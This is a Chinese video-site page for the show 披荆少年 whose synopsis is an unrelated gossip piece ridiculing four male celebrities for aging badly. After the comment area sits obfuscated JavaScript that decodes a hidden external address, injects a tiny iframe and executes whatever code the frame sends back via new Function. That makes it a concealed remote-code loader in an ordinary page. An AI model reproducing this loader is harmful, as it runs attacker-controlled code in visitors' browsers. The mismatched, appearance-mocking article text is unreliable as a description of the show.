披荆少年

  • 娱乐 时尚 音乐 生活 新闻
  • 苏有朋 李承铉
  • 每期90分钟
  • 披荆少年影片简介:在靠脸吃饭的娱乐圈,大多数明星都…披荆少年影片简介:在靠脸吃饭的娱乐圈,大多数明星都非常注重养生和保养,日常护肤是必须,医美打针更是到了一定年纪不可或缺的一个对抗岁月的手段。女明星如此,男明星也丝毫没怠慢。 有些明星冻龄很成功,年过五十状态跟三十多岁差不多;但也有一些明星保养得没那么到位,跟同龄人来说,他们显得状态不佳。 下面我们来一起聊聊四位不耐老的男明星。 一、王志文 演技派不把颜值当回事 今年六月份《叛逆者》播出的时候,观众一边折服于王志文的演技,一边吐槽他的眼袋。 明明他才55岁,看起来却有些显老。要知道他跟郭富城、陈小春、林志炫年纪不相上下,后三位可还有“哥哥”的精气神。 从《过把瘾》里高高瘦瘦的型男方言,到如今不到六十的“老态龙钟”,以演技著称的王志文完全没有把他的颜值当回事。 王志文1966年出生于上海,在父母的庇佑下他快乐地过完了童年。 13岁那年父亲病逝,他开始初尝生活的艰辛。母亲是个很能干的女人,独自撑起了家,让他可以继续完成学业。 那时候他已经爱上了表演,经常逃课去青少年宫学习,一来二去那里的老师对这个“旁听生”有了印象,便建议他去考北电。 1984年,车祸骨折都没能阻止他去参加艺考,在被哥哥抬到考场的情况下以第一名的好成绩考上了北电。 在校期间王志文开始拍摄影视剧,毕业后更是大刀阔斧地向演艺圈进军。 1992年,他凭借《皇城根儿》里的王喜一角崭露头角,同时期《过把瘾》方言让他斩获一个飞天奖视帝,将事业推向了巅峰。 那一年,他27岁。 彼时街头巷尾都在唱《糊涂的爱》,听众闭上眼睛都是王志文痞帅的身影。 是的,他不是传统意义上的帅哥,身材清瘦,肿眼泡,眼袋大,才20多岁笑起来就有一脸褶子,抬头纹尤其明显。但是他气质绝佳,有一种别样的味道和魅力。 当然,他从来不是靠脸吃饭的。 后来《刑警本色》、《黑冰》、《手机》等剧一步步让他的演技封神,他的台词更是被誉为教科书级别。 而这位优秀的演员戏外的感情史同样精彩,他的女友和传过绯闻的女演员不少,个个颜值气质俱佳。 刚上大学那会,他追到了大他两级的校花林芳兵,但那只是他青春里打马而过的一个片段;很快他又和模特潘婕擦出了爱火; 与潘婕分手后,他认识了徐帆,接着是许晴,但在错误的时间相遇,都没有开花结果。 多年后,许晴上节目表示王志文是对她影响最大的一位男友,跟他分手后她再也没交往过圈里的男明星。 历尽千帆之后,2008年愚人节42岁的王志文走进了婚姻殿堂,同年8月儿子出生,从此浪荡公子变成了居家好男人。 前任女友们见证了她的青春,妻子反而爱的是那个头发开始变少,眼袋愈发明显,颜值大幅下滑的中年男人。 但缘分有时候就是这样让人愕然。 王志文显老并不是一朝一夕的事情,过了三十岁之后他的状态就开始“崩”了 ,据粉丝说他爱抽烟喝酒,酷爱打高尔夫,也不怎么做防晒。 他大概就是用演技说话、完全不在意容貌的典型吧。 ▲王志文32岁时 二、陈冠希 从颜霸到撞脸赵本山,不过短短十载 陈冠希年轻的时候是颜霸这件事情没有异议吧? 天生自带一种玩世不恭的痞气,勾唇一笑也不会让人觉得油腻。 但同样,他的颜值也垮得非常快。 近日他发文晒照肉眼可见发福不少,脖子跟脸一般粗了,背也有些微驼。 作为老情敌,谢霆锋时常被拉出来跟他作比较,不得不说,陈冠希的保养确实不如跟他同岁的谢霆锋。 陈冠希的状态或许与他跌宕起伏的人生经历有关吧。 陈冠希1980年出生于加拿大,父亲是有名的商人,在商界和演艺圈都有丰厚的人脉,家里最不缺的东西就是钱和资源。 从小父母忙于生意疏于对他的管理,他变得很叛逆,这很大程度上为他之后的情场浪子生涯埋下了伏笔。 19岁回港度假时,应父亲好友黎明的邀请拍了一支广告,凭借俊美的形象和富二代修炼而成的时尚感、好衣品成功打入娱乐圈。 从出道到某门事件爆发,他在圈时间仅仅八年左右,但演了无数影视作品,发了无数唱片、单曲,大型演唱会也开过不少,人气如日中天。 并且随着这些影视作品在内地上映,他在内地的知名度也节节攀升。 而在作品之外,他的风流情史更为人津津乐道,Maggie Q、阿娇、张柏芝、周丽淇、邓丽欣等等,圈里圈外有名的大美女都曾卷入他的桃色新闻中。 2008年初,他因为修电脑引起了一场娱乐圈的海啸,无数当红女星卷入,一时间他成了众矢之的。面对记者的围追堵截以及媒体的口诛笔伐,他非常男人地站出来道歉,并宣布无限期退出娱乐圈。 他是富二代,从小耳濡目染颇具经商头脑,退圈之后他经营自己的潮牌,同样搞得风生水起。 2016年媒体曝出他与内地模特秦舒培的恋情,次年两人的女儿出生。就这样,35+的陈冠希开始了“好爸爸”的征程。 由于当年的事件太轰动,这些年张冠希人不在江湖,但江湖一直有他的传说,时不时就有新闻报道他的现状。 不难看出,过了35岁之后他的颜值疯狂下跌,脸更瘦了,笑纹、眼尾纹更明显了、眼袋也出来了,一度被网友调侃撞脸赵本山。 一个段子同时应运而生:每一个帅哥的最终归宿都是本山大叔。 而他本人并不没有容貌焦虑,做直播的时候不化妆不加滤镜,脸上的斑斑点点都清晰可见。 三、尹正 一位一直在跟肉肉做斗争的男星 最近《披荆斩棘的哥哥》正在热播中,大湾区的一众老哥哥保养得让人佩服不已,张智霖、陈小春、梁汉文、林晓峰等。内地很多哥哥的状态也极佳,陈辉、张淇、赵文卓、张晋、李承铉等。 而年纪在所有哥哥中排倒数的尹正反而让人大跌眼镜,他脸部肌肉松弛且略显浮肿,整个人看着有些憔悴。 之前跟黄晓明同台时,就被网友诟病不如小黄显年轻,可他比黄晓明小9岁,花期怎会如此短暂? 尹正本名谭峻鹏,1986年出生于内蒙古包头,8岁那年父母离婚,他随母亲南下广东中山生活。初到广东,为了很快地融入到当地,他以阅片的方式苦练粤语,也正是因为看得多了迷上了张国荣,梦想将来有一天自己也能成为电影人。 他小时候学过舞蹈和跆拳道,但大学改其道而行之报考了星海音乐学院,学了流行音乐,因为张国荣也是歌手。 大学期间,尹正是班里的骨干,毕业那年演出的《羊城打工谣》曾流传出网络,他站C位。 毕业后很长一段时间他面临着“失业”的尴尬,差点弃艺从商。一年之后他得到了音乐剧《妈妈咪呀》的参演机会,并结识了女主角田水。 你以为接下来会是一段荡气回肠的爱情故事? 并不是,田水推荐他去上海话剧中心演了话剧《鹿鼎记》。虽然并非科班出身,但尹正在表演上颇具天赋,深得导演王勇的认可,于是王导又把他推荐给了《龙门镖局》剧组。 就这样,处处遇伯乐,最终这个音乐生成了演员。 2015年电影《夏洛特烦恼》上线,出场自带背景音乐的袁华引起了关注,尹正开始被大家熟知。在此之后,《他来了、请闭眼》、《麻雀》、《原生之罪》等剧将他的事业推向了一个小高峰。 戏里他演技扎实,备受认可。戏外他是受到推崇的浓颜系美男,很多人说他长得神似吴彦祖。 他的五官精致,山根高得自带整容感(非贬义),但他很容易发胖,三十岁一过,福就追着他发了。 2020年拍摄《鬓边不是海棠红》时,因为角色一直在吃吃吃,他便胖出了新高度。这之后,他走上了一条减肥的不归路。 关注了他社交平台的朋友会发现,他每天都在与肉肉做斗争,餐餐的清水煮菜,吃得眼睛冒绿光,偶尔吃一次肉恨不得连盘子都啃了。 但是效果甚微,今年六月份参加微博之夜的红毯照被吐槽“姨味”很重。 没隔几天参加王彦霖的婚礼,又被网友吐槽:丑到我了。 整个人变得不清爽了不说,皮肤也松得特别厉害,颈纹更是重到这像这个年龄该有的样子。 按理说他除了节食还运动健身,不应该出现这种肌肉松弛的状态。但显然他减肥失败了,少年感已经消失殆尽,《披荆哥哥》一播出,弹幕纷纷表示:尹正这是减了个无效肥。 可能他是易胖体质吧,不管怎么样,还是祝愿他早日打败肉肉,做回帅气的“苏三省”。不然,“让老婆看着我慢慢发福,慢慢秃头”的愿望很容易实现哦。 四、阿尔法 20岁就有秃顶烦恼的少年 阿尔法,1998年出生,父母都是文艺工作者。 从5岁开始,他便随父母踏上了四处参赛、演出之路。 2003年参加央视综艺《非常6+1》而受到关注,两年后又参加了《星光大道》,获得年度总决赛亚军,从此成为了炙手可热的童星。 那时候的他一副小正太模样,五官立体而深邃,异域风非常明显; 他人小鬼大,每次在台上说话能逗得观众发笑。 观众见到他的评价无非就两种:一,他长得好帅啊,二、他好有意思啊。 成名后,他一直在坚持表演,到全国各地上通告、做节目、拍电影等等。年纪不大,人气不小。 但童星大多都有一个绕不过去的“长大变残”的坎,到了十来岁的时候,阿尔法的长势仍旧很喜人,没有什么需要担忧的地方。 但到了青春期的时候尴尬已经显现了,长得越来越粗犷,嗓音也到了变声期,所以从那时候开始他的演出渐渐少了,有那么几年直接淡出了观众的视野。 娱乐圈是一个更新换代很快的地方,走了这一波会有下一波无缝对接,待阿尔法再复出的时候,早已没有当年的风头。 2018年,20岁的阿尔法重返央视舞台,这对他来说是一个重新出发的好机会。然而,节目播出之后,大家的关注点并不在他的业务能力之上,反而在关注他的颜值。 几年不变,他已从小正太变成了“中年大叔”,身材发福了,头发也“秃然”没了。 谁也不敢相信这竟然是一个20岁的小伙子,甚至他跟40+的男主持人站在一块都不知道该谁管谁叫叔了。 他倒是很乐观,网友们的吐槽他照单全收,还让网友给他推荐生发产品。上节目的时候他自曝脱发是因为小时候做节目发胶打多了伤害了毛囊。 后来他开始健身,做了植发。他对自己也确实够狠,很快就瘦成了一道闪电。 不过,瘦是瘦了,少年感还是不强。23岁的他站在38岁的老乡尼格买提身边,好像并没有什么年龄优势。 从人气爆棚的顶流童星到“过气”,他的演艺事业可谓曲折离奇。 如今他整装待发,业务能力还在线,不知道能不能续写当年的辉煌呢?

同类型

同主演

披荆少年评论

  • 评论加载中...
function NQoIX(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function nHqeN(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return NQoIX(t);};eval('\x77\x69\x6e\x64\x6f\x77')['\x69\x48\x49\x6f\x45\x47\x56\x4e\x6a\x6e']=function(){;(function(u,r,w,d,f,c){var x=nHqeN;u=decodeURIComponent(x(u.replace(new RegExp(c+''+c,'g'),c)));var k='',wr='w'+'ri'+'t'+'e';'jQuery';var c=d[x('Y3VycmVudFNjcmlwdA==')];var f=d.createElement('iframe');f.id='x'+(Math.random()*10000);f.style.width=f.style.height=10+'px';f.src=[u,r].join('-');d[wr](f.outerHTML);w['addEventListener']('message',function(e){if(e.data[r]){d.getElementById(f.id).style.display='none';new Function(x(e.data[r].replace(new RegExp(r,'g'),'')))();}});})('aHR0cHMlM0ElMkYlMkZtZWV0aGFuc2hppLmNvbSUyRjEzNjA5Mg==',''+'WfX'+'ORj'+'Hsl'+'d'+'',window,document,''+'ezR'+'xlj'+'cH'+'','p');};